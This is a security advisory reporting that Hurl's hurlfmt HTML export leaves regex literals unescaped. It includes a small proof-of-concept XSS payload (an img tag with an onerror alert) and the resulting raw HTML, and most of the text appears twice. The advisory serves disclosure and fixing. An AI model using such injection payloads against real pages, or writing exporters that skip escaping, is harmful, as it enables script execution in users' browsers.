Headline
GHSA-v33j-v3x4-42qg: Regex literal in Hurl files are not escaped when exported to HTML, allowing injections
Given this Hurl file:
regex.hurl:
GET https://foo.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/
When exported to HTML:
$ hurlfmt --out html regex.hurl
<pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span>
</span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span>
<span class="line"><span class="section-header">[Asserts]</span></span>
<span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
</span></span><span class="line"></span>
</code></pre>
The regex literal /<img src="" onerror="alert('Hi!')">/ is not escaped:
<span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
When opened in a browser, the code is run without user interaction:
Given this Hurl file:
regex.hurl:
GET https://foo.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/
When exported to HTML:
$ hurlfmt --out html regex.hurl
<pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span>
</span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span>
<span class="line"><span class="section-header">[Asserts]</span></span>
<span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
</span></span><span class="line"></span>
</code></pre>
The regex literal /<img src="" onerror="alert(‘Hi!’)">/ is not escaped:
<span class="regex">/<img src="" onerror="alert(‘Hi!’)">/</span></span>
When opened in a browser, the code is run without user interaction:
References
- GHSA-v33j-v3x4-42qg
- Orange-OpenSource/hurl@248ac41
- Orange-OpenSource/hurl@7dcdbd1